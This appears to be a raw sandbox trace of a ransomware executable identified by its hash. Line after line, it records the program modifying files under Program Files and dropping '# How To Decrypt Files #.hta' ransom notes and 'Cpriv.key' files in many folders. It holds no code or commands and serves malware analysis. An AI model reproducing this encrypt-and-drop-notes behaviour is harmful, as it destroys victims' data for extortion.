de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Teal.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_LightSpirit.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB6.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office32.WW\Office32WW.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00784_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21294_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\1033\ACT3R.SAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Office\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Roses.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\pt-PT.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\core.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proof.en\Proof.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsMacroTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02265_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199755.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\4.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\UnpublishRestore.xps de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Sand_Paper.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitevignette1047.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00234_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\WaitConnect.xps de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Filters\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151073.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152570.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Concourse.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\codec\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\cursors.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14981_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\settings.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00479_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143745.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-image-mask.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\main.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\30.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\settings.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00308_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\MedianResume.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MSACC.OLB de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02431_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_es.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296288.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02093_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199727.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\WATERMAR\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\management.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\34.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VS_ComponentSigningIntermediate.cer de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00163_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL096.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_On.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\PassportMask_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)greenStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099192.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\SpeechEngines\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\calendars.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\Tulip.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\PROPLUS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02116_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDRESPS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\PHONE.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsfin.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\GIFT98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\BG_ADOBE.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\SPLASH.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\az.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\15x15dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Discussion.gta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16Images.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MUAUTH.CAB de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN095.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00267_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216540.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\UrbanPhotoAlbum.potx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01173_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00191_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00882_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10358_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Custom.propdesc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\file_obj.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\VelvetRose.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\EquityReport.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.CRT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\EPSIMP32.FLT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18218_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR27F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105250.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00255_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\36.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN048.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-io-ui.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\POSTITL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\MEDIA\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.data de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif 